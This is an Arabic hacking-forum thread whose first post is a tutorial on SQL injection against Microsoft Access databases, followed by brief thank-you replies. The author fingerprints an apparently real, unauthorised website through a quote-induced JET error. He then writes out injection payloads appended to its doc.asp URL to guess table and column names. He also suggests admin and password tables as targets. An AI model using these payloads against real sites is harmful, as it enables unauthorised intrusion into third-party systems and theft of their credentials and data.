 |
 |
 |
التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"
مطلوب مشرفين على كامل اقسام المنتدى
 |
 |
 |
||||||||
|
||||||||||
 |
 |
 |
||||||||
| [ منتدى حـقن قواعد البيانات | Sql injcetion ] قسم يهتم باهم ثـغرات الحقن .. حقن قواعد البيانات واهم الطرق المستعملة في ذلـك , |
 |
|
|
أدوات الموضوع | انواع عرض الموضوع |
05/05/2010, 19:18
|
المشاركة رقم: 1 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||
شكراً: 493
تم شكره 194 مرة في 101 مشاركة
|
الموضوع باختصار ! [ حقن قواعد بيانات الميكروزفت اكسس ] اولا حبيت اضع ملاحضة : انو اغلب الناس لا يفرقون بين قواعد البيانات ... بلغة اوضح ان الواحد لما يسمع ( قاعدة بيانات ) يمشي في باله طوووول [ الاسكيول ] >> SQL و هذا خطأ !!! لانه لازم نقدر نفرق بين انواع هذ القواعد DATABASE اذكر بعض القواعد المشهوره و الاكثر انتشارا و استخداما في المواقع : MySQL : طبعا هذه الاكثر انتشار الى حد الان ( و استغلالاتها منتشرة في جميع المنتديات ..) MsSQL : ميكروزفت اسكيول سرفر Microzeft SQL Server : هذه القواعد لها استغلالات كثيرة ايضا Oracle : مشهوره ايضا و لها ثغرات كثيرة ! ان شاء الله سانزل موضوع خاص بها و طرق استغلال ثغراتها MsAccess : و هي موضوع درسنا اليوم نقرتين لعرض الصورة في صفحة مستقلة Sybase : ليست مشهورة كثيرا لكن لها ثغرات ... DB2 : غير مشهوره و لها ثغرات حقن ... Informix : نوع اخر من قواعد البيانات و لها ثغرات قاتلة نقرتين لعرض الصورة في صفحة مستقلة نرجع للموضوع ! لكل نوع من هذه القواعد نوع معين من الاخطاء اهمها و اشهرها ! الخطأ الذي يضهر في قواعد الاسكيول MySQL بعد اضافة الكوت ( ' ) كود:
You have an error in your SQL syntax هذا بالنسبة لقواعد Mysql ###################################### اما ما يهمنا اليوم هو قواعد الميكروزفت اكسس MsAccess الخطأ الذي يضهر بعد اضافة الكوت ( ' ) لن يكون مثل SQL سيكون غالبا على هذا الشكل كود:
Microsoft JET Database Engineerror 'xxxxx' يلا نشوف هذا الموقع المستهدف نقرتين لعرض الصورة في صفحة مستقلة و هذا الرابط المصاب نقرتين لعرض الصورة في صفحة مستقلة الان احنا سنضيف الكوت ( ' ) بعد الرابط مباشرة و نشوف ماذا يصير نشوف صورة الرابط نقرتين لعرض الصورة في صفحة مستقلة و نشوف شو صار في الموقع ... نقرتين لعرض الصورة في صفحة مستقلة كما هو واضح في الصورة الاخيرة ضهر لنا خطأ :: كود:
Microsoft JET Database Engine error '80040e14' Syntax error in string in query expression '((documents.docID)=892') ORDER BY docorder;'. /doc.asp, line 145 و هذا يعني ان الموقع يستخدم قاعدة بيانات ميكروزفت اكسس و القاعدة بها ثغرة !!! اولا احب اوضح ان استغلال ثغرات الاكسس يعتمد بشكل كبييير على التخمين تخمين اسماء الجداول تم تخمين اسماء الاعمدة و لن نحتاج الى معرفة عدد الجداول مثل ما نفعل في قواعد الاسكيول يلا نشوف الاستغلال كيف :: نكتب بعد الرابط المصاب هذا الكود كود:
+and+0<=(select+count(*)+from+XXXXXX)+and+1=1 طبعا نضع مكان XXXXXX اسم الجدول و ما يهمنا نحن هو جدول المدير او الجودل الي فيه كلمات السر ... يعني التخمين سيكون على هذا الشكل :: admin administrateur user users admin_login administrator ... طبعا كل واحد يخمن على طريقتو ... نشوف صورة الرابط كيف راح يكون بعد اضافة كود الحقن نقرتين لعرض الصورة في صفحة مستقلة نرجع للموقع المصاب و نجرب عليه كود:
في هذا المثال ما راح اجرب على جدول كلمات السر ... لان الموقع عربي و ما يستاهل اني اخترقو و اسف لاني ما وجدت موقع غيرو اجرب عليه ( الوقت ما يسمح ... ) يلا نشوف :: اجرب جدول ( Dz_4all ) ^^ كود:
doc.asp?action=showdoc&docid=892+and+0<=(select+count(*)+from+Dz_4all)+and+1=1 نشوف شو صار في الموقع :: نقرتين لعرض الصورة في صفحة مستقلة ضهر خطأ يقول ان الجدول (Dz_4all ) غير موجود ... يلا نجرب غيره :: نضع articles مكانDz_4all و نشوف كود:
doc.asp?action=showdoc&docid=892+and+0<=(select+count(*)+from+articles)+and+1=1 نقرتين لعرض الصورة في صفحة مستقلة يا سلآآآم ! ما ضهر معانا خطأ :: يعني ان اسم الجدول articles موجود في قاعدة البيانات نقرتين لعرض الصورة في صفحة مستقلة عمل رائع الى حد الان لكن المشوار مازال طويل ... الان سنقوم نتخمين اسماء الاعمدة في الجدول الذي و جدناه و الكود سيكون على هذا الشكل :: كود:
+and+0<=(select+count(XXXXX)+from+articles)+and+1=1 كود:
doc.asp?action=showdoc&docid=892+and+0<=(select+count(XXXXXX)+from+articles)+and+1=1 يلا نجرب :: نضع كلمة DZ_4all مكان XXXXXX و نشوف نقرتين لعرض الصورة في صفحة مستقلة كود:
doc.asp?action=showdoc&docid=892+and+0<=(select+count(DZ_4all)+from+articles)+and+1=1 ضهر معانا خطأ :: يعني عمود DZ_4all عير موجود في هذا الجدول نجرب غيرو ... docid كود:
doc.asp?action=showdoc&docid=892+and+0<=(select+count(docid)+from+articles)+and+1=1 نقرتين لعرض الصورة في صفحة مستقلة ما طلع معانا اخطاء ! يعني ماشين في الطريق الصحيح نقرتين لعرض الصورة في صفحة مستقلة تم انجاز 66% من العمل و باقي غير نطلع البيانات الموجودة داخل العمود سنكتفي بهذا القدر اليوم اشوف ردودكم و تشجيعاتكم و بعد ذلك انزل الدرس الثاني ^^
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
| الأعضاء الذين قالوا شكراً لـ ViRuS_Ra3cH على المشاركة المفيدة: |
c41virus (12/03/2012)
|
|
05/05/2010, 22:50
|
المشاركة رقم: 2 | ||||||||||||
|
الله الله الله |
||||||||||||
|
|
|
||||||||||||
|
31/05/2010, 21:25
|
المشاركة رقم: 3 | ||||||||||||
|
**** يا اخي على الشرح |
||||||||||||
|
|
|
||||||||||||
|
01/07/2010, 19:59
|
المشاركة رقم: 4 | ||||||||||||
|
بارك اللهف يك على الدرس ولكن الصور لا تظهر فهل ممكن اعادة تحميلها أو ووضع شرح فيديو على كل حال بارك الله فيك |
||||||||||||
|
|
|
||||||||||||
|
20/07/2010, 09:13
|
المشاركة رقم: 5 | ||||||||||||
|
wooowowowo nice work my freind |
||||||||||||
|
|
|
||||||||||||
|
05/08/2010, 08:32
|
المشاركة رقم: 6 | ||||||||||||
|
يعطيك الف عافية اخي شرح وافي |
||||||||||||
|
|
|
||||||||||||
|
17/12/2010, 22:31
|
المشاركة رقم: 7 | ||||||||||||
|
جزاك الله كل خير اخي رعش |
||||||||||||
|
|
|
||||||||||||
|
13/05/2011, 13:34
|
المشاركة رقم: 8 | ||||||||||||
|
شرح جميل اخي الكريم |
||||||||||||
|
|
|
||||||||||||
|
29/05/2011, 18:50
|
المشاركة رقم: 9 | ||||||||||||
|
تسلم ايدك علي الشرح الجميل دا |
||||||||||||
|
|
|
||||||||||||
|
19/08/2011, 22:32
|
المشاركة رقم: 10 | ||||||||||||
|
يكون اكذب عليك اذا قت لك مبدع |
||||||||||||
|
|
|
||||||||||||
|
11/03/2012, 18:32
|
المشاركة رقم: 11 | ||||||||||||
|
مشرفني مروركم هههه ثنكس |
||||||||||||
|
|
|
||||||||||||
|
06/04/2012, 20:16
|
المشاركة رقم: 12 | ||||||||||||
|
إبدآع بصرآحة ... |
||||||||||||
|
|
|
||||||||||||
|
29/08/2012, 16:30
|
المشاركة رقم: 13 | ||||||||||||
|
مشكوووور .. بس وين الصور مفقودات .. اذا بكووون فيديو اسهل واحسن |
||||||||||||
|
|
|
||||||||||||
|
04/01/2013, 00:23
|
المشاركة رقم: 14 | ||||||||||||
|
بارک الله فيک |
||||||||||||
|
|
|
||||||||||||
|
21/02/2013, 20:58
|
المشاركة رقم: 15 | ||||||||||||
|
**** و بارك الله فيك |
||||||||||||
|
|
|
||||||||||||
|
13/07/2013, 18:31
|
المشاركة رقم: 16 | ||||||||||||
|
جييييييييييد اخي |
||||||||||||
|
|
|
||||||||||||
|
21/07/2013, 01:20
|
المشاركة رقم: 17 | ||||||||||||
|
مشكووووووووووور ويعطيك الف الف الف عافية |
||||||||||||
|
|
|
||||||||||||
|
26/12/2013, 00:39
|
المشاركة رقم: 18 | ||||||||||||
|
tnx brooooo l
|
||||||||||||
|
|
|
||||||||||||
|
19/02/2014, 22:22
|
المشاركة رقم: 19 | ||||||||||||
|
الف شكر اخي الكريم |
||||||||||||
|
|
|
||||||||||||
|
22/07/2014, 19:00
|
المشاركة رقم: 20 | ||||||||||||
|
الله يبارك فيك |
||||||||||||
|
|
|
||||||||||||
|
| مواقع النشر (المفضلة) |
| حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف) | |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| (حصري) الدرس الثاني : فيديو حقن قواعد MsAccess | ViRuS_Ra3cH | [ منتدى حـقن قواعد البيانات | Sql injcetion ] | 25 | 14/11/2015 07:47 |
| الدرس الأول: ملف الــhtmlــــ الصغير: | mbsoft | دورة لغة الـ HTML من | [ mbsoft ] | 15 | 09/07/2013 13:24 |
| الدرس الأول (الهكر وأنواعه) | ViRuS_Ra3cH | دورة تخطي الحماية للسيرفرات | Crazy_Hacker | 0 | 18/03/2010 01:20 |
 |
 |
 |
(حصري) الدرس الأول : حقن قواعد بيانات الميكروزفت اكسس MsAccess
العرض العادي
